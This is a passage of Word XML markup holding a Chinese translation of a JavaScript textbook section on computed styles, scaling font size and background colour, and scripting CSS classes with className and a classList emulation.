        <w:t>用指定的因子缩放元素</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>的文本尺寸</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function scale(e,factor){//</w:t>
      </w:r>
      <w:r>
        <w:t>用计算样式查询当前文本的尺寸</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var size=parseInt(window.getComputedStyle(e,"").fontSize);//</w:t>
      </w:r>
      <w:r>
        <w:t>用内联样式来放大尺寸</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style</w:t>
      </w:r>
      <w:r>
        <w:t>.fontSize=factor*size+"px";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>用指定的因子修改元素</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>的背景颜色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//factors</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>颜色变浅，</w:t>
      </w:r>
      <w:r>
        <w:t>factors</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>颜色变暗</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function scaleColor(e,factor){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var color=window.getComputedStyle(e,"").backgroundColor;//</w:t>
      </w:r>
      <w:r>
        <w:t>查询</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var components=color.match(/[\d\.]+/g);//</w:t>
      </w:r>
      <w:r>
        <w:t>解析</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>分量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>3;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>循环</w:t>
      </w:r>
      <w:r>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var x=Number(components[i])*factor;//</w:t>
      </w:r>
      <w:r>
        <w:t>缩放每个值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>x=Math.round(Math.min(Math.max(x,0),255));//</w:t>
      </w:r>
      <w:r>
        <w:t>设置边界并取整</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>components[i]=String(x);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>if(components.length==3)//rgb()</w:t>
      </w:r>
      <w:r>
        <w:t>颜色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.backgroundColor="rgb("+components.join()+")";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else//rgba()</w:t>
      </w:r>
      <w:r>
        <w:t>颜色</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>e.style.backgroundColor="rgba("+components.join()+")";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计算样式也具有欺骗性，查询它们得到的信息也不总是如人所愿。考虑一下</w:t>
      </w:r>
      <w:r>
        <w:t>font-family</w:t>
      </w:r>
      <w:r>
        <w:t>属性：为适应跨平台可移植性，它可以接受以逗号隔开的字体系列列表。当查询一个计算样式的</w:t>
      </w:r>
      <w:r>
        <w:t>fontFamily</w:t>
      </w:r>
      <w:r>
        <w:t>属性时，只能得到应用到该元素上具体的</w:t>
      </w:r>
      <w:r>
        <w:t>font-family</w:t>
      </w:r>
      <w:r>
        <w:t>样式的值。可能返回类似</w:t>
      </w:r>
      <w:r>
        <w:t>"arial,helvetica,sans-serif"</w:t>
      </w:r>
      <w:r>
        <w:t>的值，它无法告诉你实际使用了哪种字体。类似地，如果没有绝对定位元素，</w:t>
      </w:r>
      <w:r>
        <w:t>试图通过计算样式的</w:t>
      </w:r>
      <w:r>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>left</w:t>
      </w:r>
      <w:r>
        <w:t>属性查询它的位置和尺寸通常会返回</w:t>
      </w:r>
      <w:r>
        <w:t>"auto"</w:t>
      </w:r>
      <w:r>
        <w:t>值。这是个完全合法的</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>值，但大概不是你想要的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>getComputedStyle()</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>IE 8</w:t>
      </w:r>
      <w:r>
        <w:t>或更早的版本中没有实现，但有望在</w:t>
      </w:r>
      <w:r>
        <w:t>IE 9</w:t>
      </w:r>
      <w:r>
        <w:t>中实现。在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中，每个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素有自己的</w:t>
      </w:r>
      <w:r>
        <w:t>currentStyle</w:t>
      </w:r>
      <w:r>
        <w:t>属性，它的值是</w:t>
      </w:r>
      <w:r>
        <w:t>CSSStyleDeclaration</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>currentStyle</w:t>
      </w:r>
      <w:r>
        <w:t>组合了内联样式和样式表，但它不是真正的计算样式，因为那些相对值都没有转化成绝对值。查询</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>的当前样式属性会返回带相对性单位（如</w:t>
      </w:r>
      <w:r>
        <w:t>“%”</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"em"</w:t>
      </w:r>
      <w:r>
        <w:t>）的尺寸或者非精确的颜色值（如</w:t>
      </w:r>
      <w:r>
        <w:t>"red"</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>虽然用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>能为文档对象指定精确的位置和尺寸，查询元素的计算样式却不是判定元素尺寸和位置的完美方法。另一个更简便的方法请参见</w:t>
      </w:r>
      <w:r>
        <w:t>15.8.2</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="417" w:name="16_5_Jiao_Ben_Hua_CSSLei_"/>
      <w:r>
        <w:t>16.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　脚本化</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
      <w:bookmarkEnd w:id="417"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>通过内联</w:t>
      </w:r>
      <w:r>
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:t>属性脚本化</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式的一个可选方案是脚本化</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性值。改变元素的</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>就改变了应用于元素的一组样式表选择器，它能在同一时刻改变多个</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性。例如，假设想让用户对文档中单独的段落（或其他元素）引起注意。首先，为任意元素定义一个名为</w:t>
      </w:r>
      <w:r>
        <w:t>"attention"</w:t>
      </w:r>
      <w:r>
        <w:t>的类：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>.attention{/*</w:t>
      </w:r>
      <w:r>
        <w:t>吸引用户注意力的样式</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>background-color:yellow;/*</w:t>
      </w:r>
      <w:r>
        <w:t>黄色高亮背景</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>font-weight:bold;/*</w:t>
      </w:r>
      <w:r>
        <w:t>粗体</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>border:solid black 2px;/*</w:t>
      </w:r>
      <w:r>
        <w:t>黑框</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标识符</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中是保留字，所以</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码中应该可用于使用</w:t>
      </w:r>
      <w:r>
        <w:t>className</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码。如下代码设置和清除元素的</w:t>
      </w:r>
      <w:r>
        <w:t>className</w:t>
      </w:r>
      <w:r>
        <w:t>属性来为元素添加和移除</w:t>
      </w:r>
      <w:r>
        <w:t>"attention"</w:t>
      </w:r>
      <w:r>
        <w:t>类：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>function</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> grabAttention(e){e.className="attention";}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function releaseAttention(e){e.className="";}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素可以有多个</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>类名，</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性保存了一个用空格隔开的类名列表。</w:t>
      </w:r>
      <w:r>
        <w:t>className</w:t>
      </w:r>
      <w:r>
        <w:t>属性是一个容易误解的名字：</w:t>
      </w:r>
      <w:r>
        <w:t>classNames</w:t>
      </w:r>
      <w:r>
        <w:t>可能更好。上面的函数假设</w:t>
      </w:r>
      <w:r>
        <w:t>className</w:t>
      </w:r>
      <w:r>
        <w:t>属性只指定零个或一个类名，如果有多个类名就无法工作了。如果元素已经有一个类了，为该元素调用</w:t>
      </w:r>
      <w:r>
        <w:t>grabAttention()</w:t>
      </w:r>
      <w:r>
        <w:t>函数将覆盖已存在的类。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>解决了这个问题，为每个元素定义了</w:t>
      </w:r>
      <w:r>
        <w:t>classList</w:t>
      </w:r>
      <w:r>
        <w:t>属性。该属性值是</w:t>
      </w:r>
      <w:r>
        <w:t>DOMTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>对象：一个只读的类数组对象（见</w:t>
      </w:r>
      <w:r>
        <w:t>7.11</w:t>
      </w:r>
      <w:r>
        <w:t>节），它包含元素的单独类名。但是，和数组元素相比，</w:t>
      </w:r>
      <w:r>
        <w:t>DOMTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>定义的方法更加重要。</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>remove()</w:t>
      </w:r>
      <w:r>
        <w:t>从元素的</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性中添加和清除一个类名。</w:t>
      </w:r>
      <w:r>
        <w:t>toggle()</w:t>
      </w:r>
      <w:r>
        <w:t>表示如果不存在类名就添加一个；否则，删除它。最后，</w:t>
      </w:r>
      <w:r>
        <w:t>contains()</w:t>
      </w:r>
      <w:r>
        <w:t>方法检测</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性中是否包含一个指定的类名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似其他</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>集合类型，</w:t>
      </w:r>
      <w:r>
        <w:t>DOMTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>实时地</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>代表了元素</w:t>
      </w:r>
      <w:r>
        <w:t>类名集合，而并非是在查询</w:t>
      </w:r>
      <w:r>
        <w:t>classList</w:t>
      </w:r>
      <w:r>
        <w:t>属性时类名的一个静态快照。如果从元素的</w:t>
      </w:r>
      <w:r>
        <w:t>classList</w:t>
      </w:r>
      <w:r>
        <w:t>属性中获得了一个</w:t>
      </w:r>
      <w:r>
        <w:t>DOMTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>对象，然后元素的</w:t>
      </w:r>
      <w:r>
        <w:t>className</w:t>
      </w:r>
      <w:r>
        <w:t>属性改变了，这些变化在标识列表中及时可见。同样，改变标识列表，在</w:t>
      </w:r>
      <w:r>
        <w:t>className</w:t>
      </w:r>
      <w:r>
        <w:t>属性中及时可见。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>在写本书的这段时间里，不是现在所有的浏览器都支持</w:t>
      </w:r>
      <w:r>
        <w:t>classList</w:t>
      </w:r>
      <w:r>
        <w:t>属性。但是，这个重要的功能很容易近似实现，如例</w:t>
      </w:r>
      <w:r>
        <w:t>16-5</w:t>
      </w:r>
      <w:r>
        <w:t>所示。使用类似的代码，把元素的</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性当做一个类名集合，使得许多脚本化</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>工作更加简单。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>16-5</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>classList()</w:t>
      </w:r>
      <w:r>
        <w:t>：将</w:t>
      </w:r>
      <w:r>
        <w:t>className</w:t>
      </w:r>
      <w:r>
        <w:t>当做一个</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>类集合</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如果</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>有</w:t>
      </w:r>
      <w:r>
        <w:t>classList</w:t>
      </w:r>
      <w:r>
        <w:t>属性则返回它。否则，返回一个为</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>模拟</w:t>
      </w:r>
      <w:r>
        <w:t>DOMTokenList API</w:t>
      </w:r>
      <w:r>
        <w:t>的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>返回的对象有</w:t>
      </w:r>
      <w:r>
        <w:t>contains()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>add()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>remove()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>toggle()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>等方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>来检测和修改元素</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>的类集合。如果</w:t>
      </w:r>
      <w:r>
        <w:t>classList</w:t>
      </w:r>
      <w:r>
        <w:t>属性是原生支持的，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>返回的类数组对象有</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>和数组索引属性。模拟</w:t>
      </w:r>
      <w:r>
        <w:t>DOMTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>不是类数组对象，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t>但是它有一个</w:t>
      </w:r>
      <w:r>
        <w:t>toArray()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来返回一</w:t>
      </w:r>
      <w:r>
        <w:t>个含元素类名的纯数组快照</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function classList(e){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(e.classList)return e.classList;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>e.classList</w:t>
      </w:r>
      <w:r>
        <w:t>存在，则返回它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else return new CSSClassList(e);//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，就伪造一个</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//CSSClassList</w:t>
      </w:r>
      <w:r>
        <w:t>是一个模拟</w:t>
      </w:r>
      <w:r>
        <w:t>DOMTokenList</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function CSSClassList(e){this.e=e;}//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>e.className</w:t>
      </w:r>
      <w:r>
        <w:t>包含类名</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>否则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>CSSClassList.prototype.contains=function(c){//</w:t>
      </w:r>
      <w:r>
        <w:t>检查</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>是否是合法的类名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(c.length===0||c.indexOf("")!=-1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>throw new Error("Invalid class name:'"+c+"'");//</w:t>
      </w:r>
      <w:r>
        <w:t>首先是常规检查</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var classes=this.e.className;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!classes)return false;//e</w:t>
      </w:r>
      <w:r>
        <w:t>不含类名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(classes===c)return true;//e</w:t>
      </w:r>
      <w:r>
        <w:t>有一个完全匹配的类名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>否则，把</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>自身看做一个单词，利用正则表达式搜索</w:t>
      </w:r>
      <w:r>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//\b</w:t>
      </w:r>
      <w:r>
        <w:t>在正则表达式里代表单词的边界</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
